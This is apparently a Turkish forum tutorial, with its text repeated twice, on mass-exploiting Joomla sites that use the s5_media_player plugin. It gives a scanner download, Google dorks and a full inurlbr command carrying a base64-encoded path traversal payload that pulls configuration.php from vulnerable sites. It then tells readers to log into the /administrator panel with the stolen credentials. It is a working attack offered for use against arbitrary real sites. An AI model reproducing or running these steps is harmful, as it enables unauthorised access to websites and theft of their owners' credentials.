Merhabalar arkadaşlar;
Sİzlere "joomla config" exploidini göstermeye çalışacağım elimden geldiğince
Aşamalar:
1)Exploit'e sahip olan siteleri aramak için "inurlbr" adlı bir aracımız var.İlk önce onu yükleyelim isteyen kodlarını alabilir.
Aşama 1 için:
kodlarını githubdan çekebiliriz.
>>Direk indirmek için "wget https://github.com/googleinurl/SCANNER-INURLBR"
aracı çalıştırmak için php'yi yüklemek gerekecek bunu depodan alabilirsiniz.
Eğer Ubuntu kulanıyorsanız "apt-get install php " yazabilirsiniz.
Eğer Arch tabanlı kullanıyorsanız "pacman -S php" yazabilirsiniz.
NOT:Ben arch kullanıyorum ve depoda vardır ubuntuyu bilmiyorum synaptic ile de yükleyebilirisiniz.
2)Daha sonra terminal ile scanner dosyamıza gelelim ve şu kodu yazalım.
KOD:
php inurlbr.php --dork 'index of "/s5_media_player/"' -s s5.txt --exploit-get '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=' --unique --ifcode 200
Kendimiz aramak istersek .
DORK:
inurl:"php?fileUrl="
inurllugins/content/s5_media_player/
3)Sabredin bulduktan sonra direk link verecek size linke girdiğinizde de otomatik olarak config dosyasını verecek.
Config:
İçinde kullanıcı,site ve domain hakkında bilgilerin yer aldığı dosyadır.
4)Siteler joomla tabanlı olduğu için admin paneline /administrator yazarak ulaşabiliriz.
Config dosyasındaki bilgileri panele girerek admin paneline ulaşabilirisiniz.
Takıldığınız yer, anlamadığınız bir yer olursa:
[email protected]
yada
site üzerinden bana özel mesaj olarak ulaşabilirsiniz açık olduğumda kesinlikle cevaplarım.
:jeerat
Sİzlere "joomla config" exploidini göstermeye çalışacağım elimden geldiğince
Aşamalar:
1)Exploit'e sahip olan siteleri aramak için "inurlbr" adlı bir aracımız var.İlk önce onu yükleyelim isteyen kodlarını alabilir.
Aşama 1 için:
kodlarını githubdan çekebiliriz.
>>Direk indirmek için "wget https://github.com/googleinurl/SCANNER-INURLBR"
aracı çalıştırmak için php'yi yüklemek gerekecek bunu depodan alabilirsiniz.
Eğer Ubuntu kulanıyorsanız "apt-get install php " yazabilirsiniz.
Eğer Arch tabanlı kullanıyorsanız "pacman -S php" yazabilirsiniz.
NOT:Ben arch kullanıyorum ve depoda vardır ubuntuyu bilmiyorum synaptic ile de yükleyebilirisiniz.
2)Daha sonra terminal ile scanner dosyamıza gelelim ve şu kodu yazalım.
KOD:
php inurlbr.php --dork 'index of "/s5_media_player/"' -s s5.txt --exploit-get '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=' --unique --ifcode 200
Kendimiz aramak istersek .
DORK:
inurl:"php?fileUrl="
inurllugins/content/s5_media_player/
3)Sabredin bulduktan sonra direk link verecek size linke girdiğinizde de otomatik olarak config dosyasını verecek.
Config:
İçinde kullanıcı,site ve domain hakkında bilgilerin yer aldığı dosyadır.
4)Siteler joomla tabanlı olduğu için admin paneline /administrator yazarak ulaşabiliriz.
Config dosyasındaki bilgileri panele girerek admin paneline ulaşabilirisiniz.
Takıldığınız yer, anlamadığınız bir yer olursa:
[email protected]
yada
site üzerinden bana özel mesaj olarak ulaşabilirsiniz açık olduğumda kesinlikle cevaplarım.
:jeerat